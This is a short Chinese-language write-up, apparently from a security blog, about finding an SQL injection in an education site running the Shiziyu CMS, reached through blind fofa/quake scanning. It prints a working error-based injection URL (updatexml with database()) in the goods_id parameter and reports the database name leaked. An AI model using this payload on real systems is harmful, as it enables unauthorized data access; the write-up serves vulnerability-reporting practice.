EDU实战-SQL注入漏洞

复制代码
对于edu来说,是新人挖洞较好的平台,本次记录一次走运的捡漏

0x01 前景

在进行fofa盲打站点的时候,来到了一个后台管理处看到集市二字,应该是edu站点

确认目标身份(使用的quake进行然后去ipc备案查询)

网站后台很像cms搭建的,在查看网站时发现

复制代码
/seller.php?s=/Public/login

狮子鱼cms的特征

直接去百度一手,发现有个SQL注入还有其他的,打算一个一个尝试看看

0x02 尝试挖掘

payload

复制代码
https://www.xxx.com/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)

成功爆破出数据库名

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

点赞+在看支持一下吧~

你的点赞是我更新的动力,免费领取安全学习资料包!

https://docs.qq.com/doc/DYlBlQ2xhaFBmamtq

相关推荐
IpdataCloud16 分钟前
跨境AI金融风险怎么防?IP风险画像的实战应用指南
数据库·tcp/ip·金融·ip
2601_957174652 小时前
零基础学网络安全能学好吗
安全·web安全
Alan_752 小时前
API 接口慢调用根因定位:从 TCP 建连到数据库 IO 的全栈排查实战
数据库
多巴胺梦想家3 小时前
事务与并发控制:当多人同时操作数据库
服务器·数据库·oracle
howard20054 小时前
PostgreSQL起步
数据库·postgresql
秋田君4 小时前
QT_QT布局详解
开发语言·数据库·qt
m0_738120724 小时前
PHP代码审计基础——超全局变量(三)
开发语言·安全·网络安全·php
可乐ea5 小时前
【Redis八股|第8篇】Redis 分布式锁原理与 Redisson 使用
数据库·redis·分布式·面试题·redis八股
李燚5 小时前
Eino devops 调试系统源码:GraphCompileCallback 怎么工作(第50篇-E36)
数据库·golang·agent·devops·graphql·aiagent·eino
醉城夜风~5 小时前
SQL DQL数据查询语言全套学习笔记(基础查询→执行顺序全解析)
笔记·sql·学习